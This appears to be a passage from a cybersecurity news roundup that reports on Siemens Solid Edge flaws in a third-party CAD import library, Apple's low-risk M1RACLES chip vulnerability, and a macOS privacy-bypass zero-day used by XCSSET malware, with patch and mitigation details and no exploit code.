These zero-days were abused by a group known as UNC2682 to backdoor systems via BEHINDER web shells, allowing the attackers to travel laterally through their victims' networks and access emails and files, as Mandiant discovered researching the attacks.

Solid Edge: Solid Modeling Software Affected by Vulnerabilities

 

Siemens published a consumer notice on Tuesday 25th of May concerning several serious vulnerabilities impacting its Solid Edge product. The faults are generated using the software of the fourth party, which many other organizations often use. 

“The Solid Edge installation package includes a specific version of the third-party product KeyShot from Luxion, which may not contain the latest security fixes provided by Luxion. Siemens recommends updating KeyShot according to the information in the Luxion Security Advisory LSA-394129,” read the advisory released by Siemens. 

Security researcher Andrea Micalizzi, who has detected numerous flaws in industrial systems in recent years, also discovered the problems in Siemens Solid Edge last year. The vulnerability problems have been reported by the Zero Day Initiative (ZDI) of Trend Micro and the US Cybersecurity and Infrastructure Security Agency (CISA). 

Solid Edge is a software for solid modeling in 3D CAD, parametric and synchronous technology. It operates on Microsoft Windows and offers mechanical engineers solid modeling, assembly modeling, and 2D orthographic viewing functions. 

Micalizzi found that five vulnerabilities harm the product, comprising four serious memory corruption flaws which allow remote code implementation and one medium-sized XXE problem that could provide for the exposure of information. The vulnerabilities can indeed be triggered through the processing of malicious CATPart, 3DXML, STP, PRT, or JT files by the potential customer. 

A vulnerability-focused study indicated that they were developed by the use of KeyShot, a 3D rendering and animation solution produced by Luxion. More studies indicated that Datakit CrossCad / Ware, a library that KeyShot uses to import different CAD (computer-aided design) files, actually introduces the problems. 

CrossCAD /Ware has been used by a wide variety of different products, even though only Siemens, KeyShot, and CISA have published warnings for the issues. 

On 12 May, ZDI also published advisories with a "0day" status on each of the vulnerabilities because they were reportedly not patched. 

The Zero Day notice read as “This vulnerability allows remote attackers to execute arbitrary code on affected installations of Siemens Solid Edge Viewer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. A specific flaw exists within the parsing of JT files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated data structure. An attacker can leverage this vulnerability to execute code in the context of the current process.” 

Datakit nevertheless reported that they had resolved the issues in April with version 2021.2 of CrossCAD/Ware. The company has encouraged providers of software to upgrade to version 2021.2 – previous versions are still impacted. The company also proposed to avoid untrusted files from unverified senders to users of impacted applications. 

Luxion published KeyShot 10.2, which contains the patched version of the Datakit library, and Siemens has urged users in Solid Edge to upgrade KeyShot according to the security advisory instructions given by Luxion.

M1RACLES Bug Impacts Apple M1 Chips

 

A security researcher identified the first-ever vulnerability in Apple M1 chips that requires a silicon redesign to fix. The good news is that the flaw is considered low-risk, and even the security researcher who identified it believes the flaw is insignificant and has sought to avoid exaggerating the problem while presenting his findings. 

The vulnerability was codenamed M1RACLES and is presently tracked as CVE-2021-30747. It was discovered by Hector Martin, a software engineer at Asahi Linux, a project that works on porting Linux for Mac devices. 

In a simplified explanation, Martin explained that the vulnerability allowed two apps running on the same device to exchange data via a hidden channel at the CPU level, circumventing memory, sockets, files, and other standard operating system features. While the discovery is notable because of the amount of time, work, knowledge, and proficiency required to find bugs in a CPU's physical design, Martin states that the problem is of no benefit to attackers. 

The only way Martin can see this bug being abused is by dodgy advertising businesses, which could abuse an app they already had installed on a user's M1-based device for cross-app tracking, which would be a really bizarre scenario since the ad industry has many other more reliable data collection methods. 

Even though the M1RACLEs bug violates the OS security model by allowing a CPU process to transfer data to another CPU process over a secret channel, Martin believes the flaw was caused by a human error on Apple's M1 design team. 

“Someone in Apple’s silicon design team made a boo-boo. It happens. Engineers are human,” he said. Martin further added that he has informed Apple of his discoveries, but the firm has yet to clarify whether the flaw will be fixed in future M1 chip silicon versions. Martin revealed and debunked his own findings on a dedicated website that ridiculed similar sites developed in the past to advertise CPU vulnerabilities—many of which, like M1RACLEs, were similarly meaningless and insignificant to people's threat models. 

Martin concludes that exploitation on iOS may be used to overcome privacy protections adding that a malicious keyboard app may act as a keylogger by transferring typed text to another malicious app, which could subsequently transfer the information to the internet. 

However, he suggests that because of Apple's constraints on creating code at runtime, the firm could detect exploit attempts if it subjected App Store submissions to static analysis. The hypervisors disable guest access to the vulnerable register by default, the flaw can be mitigated by utilizing a virtual machine, but there aren't many other solutions, particularly on macOS.

Apple Fixes macOS Zero Day Vulnerability, Abused by XCSSET macOS Malware

 

Apple has released security updates for a variety of its products, including a patch for three macOS and tvOS zero-day vulnerabilities. The patch comprises a zero-day vulnerability fix that has been exploited in the wild for nearly a year by the XCSSET malware gang. 

Apple said it was aware of allegations that the security flaws "may have been actively exploited" in all three cases, but it didn't go into detail about the assaults or threat actors who might have exploited the zero-days. 

WebKit on Apple TV 4K and Apple TV HD devices is affected by two of the three zero-days (CVE-2021-30663 and CVE-2021-30665). Webkit is an HTML rendering engine used by Apple's web browsers and applications on its desktop and mobile platforms, including iOS, macOS, tvOS, and iPadOS.Threat actors might use maliciously generated web content to attack the two vulnerabilities, which would allow arbitrary code execution on unpatched devices due to a memory corruption issue. 

The third zero-day (CVE-2021-30713) is a permission issue found in the Transparency, Consent, and Control (TCC) framework that affects macOS Big Sur devices. The TCC framework is a macOS subsystem that prevents installed apps from accessing sensitive user information without asking the user for explicit permission via a pop-up message. A maliciously constructed application could be used to exploit this issue, bypassing Privacy settings and gaining access to sensitive user data. 

While Apple didn't provide much detail about how the three zero-days were exploited in assaults, Jamf researchers found that the macOS zero-day (CVE-2021-30713) patched was leveraged by the XCSSET malware to get beyond Apple's TCC privacy measures. 

According to the researchers, "the exploit in question could allow an attacker to gain Full Disk Access, Screen Recording, or other permissions without requiring the user's explicit consent — which is the default behavior." 

"We, the members of the Jamf Protect detection team, discovered this bypass being actively exploited during the additional analysis of the XCSSET malware, after noting a significant uptick of detected variants observed in the wild. The detection team noted that once installed on the victim’s system, XCSSET was using this bypass specifically for the purpose of taking screenshots of the user’s desktop without requiring additional permissions." 

Trend Micro's Mac Threat Response and Mobile Research teams first detected XCSSET in August 2020. According to the researchers, the vulnerability can be used to provide malicious applications with permissions such as disk access and screen recording. As a result of this, threat actors will be able to take screenshots of affected PCs. 

Last month, Trend Micro discovered a new XCSSET version that was upgraded to work with the newly launched Apple-designed ARM Macs. The CVE-2021-30713 vulnerability was discovered shortly after Craig Federighi, Apple's head of software stated that macOS has an "unacceptable" level of malware, which he linked to the diversity of software sources. 

Apple addressed two iOS zero-days in the Webkit engine earlier this month, allowing arbitrary remote code execution (RCE) on vulnerable devices solely by visiting malicious websites. In addition, Apple has been releasing fixes for a number of zero-day bugs that have been exploited in the wild in recent months, including one that was resolved in macOS in April and a bunch of other iOS vulnerabilities that were resolved in the prior months.